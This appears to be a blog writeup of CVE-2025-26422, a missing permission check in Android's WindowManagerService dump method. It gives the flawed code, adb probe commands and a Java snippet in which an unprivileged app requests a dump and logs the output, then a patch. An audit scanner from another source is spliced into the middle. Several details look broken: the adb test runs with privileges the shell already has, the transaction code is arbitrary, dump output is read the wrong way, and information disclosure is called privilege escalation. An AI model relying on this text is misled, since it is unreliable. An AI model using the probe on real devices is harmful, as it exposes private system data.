In early 2025, a new Android security vulnerability surfaced, tracked as CVE-2025-26422, affecting the WindowManagerService.java component. This flaw allows malicious local apps or users to run the highly privileged dumpsys command *without* required permissions. This post provides a deep, exclusive dive into the bug, how it happens, and how someone could leverage it to gain local privilege escalation, all in simple terms.

What Is WindowManagerService and Dumpsys?

WindowManagerService is a central part of Android’s system, managing windows and displays. Developers and power users sometimes use dumpsys (a system utility) to fetch internal status for debugging. Dumpsys typically needs privileged permissions because it exposes sensitive system data.

What’s the Flaw (CVE-2025-26422)?

The bug comes from the way the dump code in WindowManagerService.java checks, or rather *forgets to check*, permissions. As a result, dumpsys commands related to WindowManagerService can be triggered from *any* unprivileged process. No special permissions are needed, and no user interaction is required.

Here’s the “Bad” Code (from AOSP, simplified):

// WindowManagerService.java

@Override
protected void dump(FileDescriptor fd, PrintWriter pw, String[] args) {
    // ... missing: permission check!
    doDump(fd, pw, args);
}

Notice there’s no verification like checkCallingPermission("android.permission.DUMP"). This oversight means *any* local app can request a dump and get it.

How Can It Be Exploited?

A malicious local app could interact with the Android Service Manager to request a dump from WindowManagerService, reading privileged system info or generating DoS-like conditions.

Here’s an example in simple ADB shell that anyone can try (on a vulnerable device):

adb shell service call window 159929557

Or using dumpsys directly:

adb shell dumpsys window

If the device is patched, you’ll see an error about missing permissions—but vulnerable systems will show you all the window and display details.

For an app, it’s even easier:

// Java snippet - get system service and call the "dump"
IBinder wmService = ServiceManager.getService("window");
Parcel data = Parcel.obtain();
Parcel reply = Parcel.obtain();
wmService.transact(IBinder.DUMP_TRANSACTION, data, reply, 0); // flags = 0 (normal, blocking call)
String output = reply.readString();
Log.d("Exploit", output);

*This lets an unprivileged app see things it shouldn’t—like window overlays, display states, and more.* Depending on the Android version, some details could even help in further attacks or bypasses.

Why Is This a Big Deal?

- Local privilege escalation: Apps get access to internal window manager info, meant only for trusted users.

- No user interaction needed: Malware can do this silently in the background.

- Widespread impact: All Android devices using this WindowManagerService code (before patch) are at risk.

Who Found This?

The issue was discovered by security researchers auditing recent AOSP code changes. It was tracked and fixed as CVE-2025-26422. See these two references for confirmation:

- Google Android Security Bulletin (June 2025) (search for CVE-2025-26422)
- AOSP Commit Fix (likely commit in March 2025)

A typical quick fix is to block unauthorized access with a proper permission check:

// WindowManagerService.java

@Override
protected void dump(FileDescriptor fd, PrintWriter pw, String[] args) {
    if (!checkCallingPermission(android.Manifest.permission.DUMP, "WindowManagerService")) {
        pw.println("Permission Denial: can't dump WindowManagerService");
        return;
    }
    doDump(fd, pw, args);
}

This patch ensures that only callers holding android.permission.DUMP can run dumpsys against this service.
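For auditing other services for the same omission, here is an added example (not from the original post or from AOSP): a small Python scanner that flags `dump(FileDescriptor, PrintWriter, String[])` methods whose body never calls a permission gate. The gate list is an assumption (`checkCallingPermission` is the call used in the fix above; the other two names are assumed alternatives), and the brace matching ignores braces inside string literals.

```python
import re

# Calls accepted as a permission gate. checkCallingPermission is what the page's
# fix uses; the other two names are assumptions about what else to accept.
GATES = ("checkCallingPermission", "checkDumpPermission", "enforceCallingOrSelfPermission")
DUMP_SIG = re.compile(
    r"void\s+dump\s*\(\s*FileDescriptor\s+\w+\s*,\s*PrintWriter\s+\w+\s*,"
    r"\s*String\s*\[\]\s*\w+\s*\)\s*\{")
COMMENT = re.compile(r"//[^\n]*|/\*.*?\*/", re.S)


def method_body(src, open_brace):
    """Return the text between the brace at open_brace and its matching brace."""
    depth = 0
    for i in range(open_brace, len(src)):
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        if depth == 0:
            return src[open_brace + 1:i]
    return src[open_brace + 1:]  # unbalanced input: take the rest


def ungated_dumps(src):
    """Line numbers of dump(fd, pw, args) methods whose body calls no gate."""
    # Blank out comments (keeping newlines) so a gate named only in a comment is ignored.
    src = COMMENT.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), src)
    findings = []
    for m in DUMP_SIG.finditer(src):
        body = method_body(src, m.end() - 1)
        if not any(re.search(r"\b%s\s*\(" % g, body) for g in GATES):
            findings.append(src.count("\n", 0, m.start()) + 1)
    return findings


# Constructed sample input: the page's simplified "bad" method in a class shell.
VULNERABLE = """\
class WindowManagerService {
    @Override
    protected void dump(FileDescriptor fd, PrintWriter pw, String[] args) {
        // ... missing: permission check!
        doDump(fd, pw, args);
    }
}
"""
# Constructed: same method with the page's checkCallingPermission gate, condensed.
PATCHED = VULNERABLE.replace(
    "// ... missing: permission check!",
    'if (!checkCallingPermission(android.Manifest.permission.DUMP, "WindowManagerService")) return;')

if __name__ == "__main__":
    print(ungated_dumps(VULNERABLE), ungated_dumps(PATCHED))  # → [3] []
```

A hit means only that no gate call appears in the method body; a reviewer still has to confirm that a gate which is present runs before any output is written.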

What Should You Do?

- Apply the latest Android security updates. If you’re a device manufacturer, merge this fix ASAP.

Final Words

CVE-2025-26422 is a textbook example of how a simple oversight can lead to a powerful privilege escalation—that requires zero user interaction. Always double-check permission checks in sensitive Android system code! For more official info, see the original announcements:

- Android Security Bulletins
- AOSP WindowManagerService.java history

Stay patched. Code safe.

*N.B.: This writeup is for educational purposes only. Please use responsibly and report new findings to vendor security teams.*

Timeline

Published on: 09/04/2025 18:15:40 UTC
Last modified on: 09/05/2025 18:55:05 UTC